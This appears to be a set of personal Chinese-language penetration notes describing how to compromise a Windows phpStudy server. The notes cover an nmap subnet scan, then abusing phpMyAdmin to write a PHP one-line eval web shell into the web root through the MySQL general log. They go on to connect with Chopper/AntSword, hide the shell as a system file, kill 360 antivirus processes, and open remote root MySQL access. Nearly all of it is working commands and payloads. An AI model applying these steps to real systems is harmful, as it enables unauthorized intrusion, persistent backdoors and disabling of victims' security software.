1.
nmap扫描局域网中开放的特定端口
nmap -sS -p 80 192.168.1.0/24
//半开放式扫描 192.168.1.0/24网段中开放80端口的
2.
进入phpmyadmin数据库后
在localhost下找到变量按钮
包含文字处输入general log
3.
设置general log 和 general log file
general log 为 ON
general log file 为 C:phpStudyPHPTutorialWWWshell.php
4.(一些命令查看路径等)
show variables like "%plugin%";
show VARIABLES LIKE "%general%";
set GLOBAL general_log = 'on';
set global general_log_file = 'C:\phpStudy\PHPTutorial\WWW\phpMyadmin\udf.php';
然后选择数据库旁边的SQL按钮
在SQL查询中输入查询一句话木马语句
select "<?php @eval($_POST[cmd]);?>"
点击执行
然后测试是否插入成功
浏览器输入
运行后页面显示一些日志数据,则植入成功
用菜刀或者蚁剑连接
连接后先上传大马
隐藏木马
命令行输入attrib +H +S muma.php
attrib 修改文件属性 +设置属性 H隐藏文件属性 S系统文件属性
/*下面的没成功,结束不了360进程*/
或者先在终端杀掉360进程(创建用户会被360拦截)
然后创建用户远程控制
cmd杀掉进程操作
Taskkill /pid [进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
方法一、
先找到进程名称,然后杀掉
tasklist //显示进程
tasklist /f /t /im 360Tray.exe //杀掉360进程
方法二、
先找到进程id,然后杀掉
tasklist //显示进程
tskill pid //杀掉进程id为pid的
taskkill /?
描述:
这个命令行工具可用来结束至少一个进程。可以根据进程 id 或图像名来结束进程。
参数列表:
/S system 指定要连接到的远程系统。
/U [domain]user 指定应该在哪个用户上下文执行这个命令。
/P [password] 为提供的用户上下文指定密码。如果忽略,提示输入。
/F 指定要强行终止进程。
/FI filter 指定筛选进或筛选出查询的的任务。
/PID process id 指定要终止的进程的PID。
/IM image name 指定要终止的进程的图像名。通配符 '*'可用来指定所有图像名。
/T Tree kill: 终止指定的进程和任何由此启动的子进程。
/? 显示帮助/用法。
打开MySQL远程连接的命令以及含义
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
(grant all privileges on 库名.表名 to '用户名'@'IP地址' identified by '密码' with grant option;)
